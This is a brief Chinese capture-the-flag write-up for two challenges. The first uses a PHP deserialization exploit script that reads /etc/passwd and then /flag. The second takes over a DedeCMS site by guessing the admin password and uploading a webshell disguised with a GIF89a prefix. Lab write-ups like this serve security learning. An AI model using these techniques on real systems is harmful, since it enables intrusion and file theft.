0%

ciscn2026 writeup

hellogate

点进去是个图片,ctrl+u被禁了,看不了源码

直接在网页头输入view-source:查看源码

看到图片的结尾有一段php反序列化

编写exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
class A{
public $handle;
}
class B{
public $worker;
public $cmd;
}
class C{
public $cmd='/etc/passwd';
}
$c=new C();
$b=new B();
$b->worker=$c;
$a=new A();
$a->handle=$b;
echo (serialize($a));
?>

然后抓包

将路径/etc/passwd改为/flag

dedecms

如题,打开是一个dedecms

经过一些信息检索,发现网站后台是/dede

然后没有任何关于用户的信息,所以先创建一个用户test1

邮箱随便输一个,要符合邮箱格式。登录后到网站主页,点头像,然后看到右下角有三个用户

点到admin的空间里

没有看到什么有用的信息,还有个可疑用户Aa123456789,这个名字很奇怪,就试了一下这个用户名当作密码

到网站后台登陆

居然登陆成功了

然后根据经验找到一个文件上传的利用点

上传jpg,改文件后缀名,加上GIFA89a的图片前缀,上传成功后显示木马路径,直接访问

执行命令,flag在根目录下